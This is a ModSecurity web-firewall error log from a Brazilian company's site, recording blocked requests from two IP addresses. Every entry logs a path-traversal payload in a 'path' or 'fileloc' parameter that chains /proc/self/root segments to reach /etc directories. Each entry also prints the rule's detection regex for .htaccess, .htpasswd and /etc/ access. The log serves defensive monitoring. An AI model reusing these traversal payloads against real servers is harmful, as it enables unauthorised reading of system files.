[Mon Mar 16 18:21:53.475315 2026] [:error] [pid 14895:tid 140411582465792] [client 74.7.243.203:57238] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh0cVajLEzk2WiQ-10wHAAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:21:56.823130 2026] [:error] [pid 10651:tid 140411741927168] [client 74.7.241.46:50538] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh0dLysWC90G-1nBrBhzgAAAYA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:22:01.600891 2026] [:error] [pid 15061:tid 140411691570944] [client 74.7.243.203:48428] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh0eaTCbgAP5jq5TehJZgAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:22:07.060131 2026] [:error] [pid 15061:tid 140411582465792] [client 74.7.241.46:56748] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh0f6TCbgAP5jq5TehJcAAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:22:13.258997 2026] [:error] [pid 21805:tid 140411574073088] [client 74.7.243.203:35640] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh0hbABkC4fWIHEf8EVnwAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:22:39.111245 2026] [:error] [pid 10651:tid 140411658000128] [client 74.7.241.46:48224] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh0n7ysWC90G-1nBrBiDQAAAYo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:22:40.527477 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.241.46:33480] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh0oNSswJuvopo3lOh-NgAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:22:41.803522 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.241.46:33496] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh0of9ocpUE4ed4uDwRPQAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:22:49.631643 2026] [:error] [pid 21806:tid 140411590858496] [client 74.7.241.46:33512] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh0qdSswJuvopo3lOh-PQAAAJI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:22:58.394262 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.241.46:33544] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh0srABkC4fWIHEf8EVuAAAAEM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:22:59.735854 2026] [:error] [pid 15061:tid 140411708356352] [client 74.7.241.46:32976] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh0s6TCbgAP5jq5TehJoAAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:23:47.746417 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.241.46:32990] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/polkit-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh049SswJuvopo3lOh-dQAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:23:49.151287 2026] [:error] [pid 15568:tid 140411582465792] [client 74.7.241.46:45912] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh05aQpVkWug9HeOt9RKQAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:23:51.638994 2026] [:error] [pid 29802:tid 140411658000128] [client 74.7.241.46:45924] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh058_BxrYCr4hPDw8H0AAAAco"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:23:54.115621 2026] [:error] [pid 15568:tid 140411590858496] [client 74.7.241.46:45930] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh06qQpVkWug9HeOt9RKwAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:24:10.691983 2026] [:error] [pid 15568:tid 140411716749056] [client 74.7.241.46:45936] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh0-qQpVkWug9HeOt9RRgAAA0M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:24:22.896062 2026] [:error] [pid 15061:tid 140411716749056] [client 74.7.241.46:52612] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh1BqTCbgAP5jq5TehJ0AAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:24:25.283517 2026] [:error] [pid 14895:tid 140411708356352] [client 74.7.241.46:57040] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh1CVajLEzk2WiQ-10wWQAAAoQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:24:27.831486 2026] [:error] [pid 10831:tid 140411733534464] [client 74.7.241.46:57042] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh1C46lpbStxTqkSkuGqgAAAkE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:24:41.754326 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.241.46:55496] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh1GbABkC4fWIHEf8EV7AAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:24:43.053542 2026] [:error] [pid 29507:tid 140411616036608] [client 74.7.241.46:51378] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh1G0r9dMAiw-8KANNmZAAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
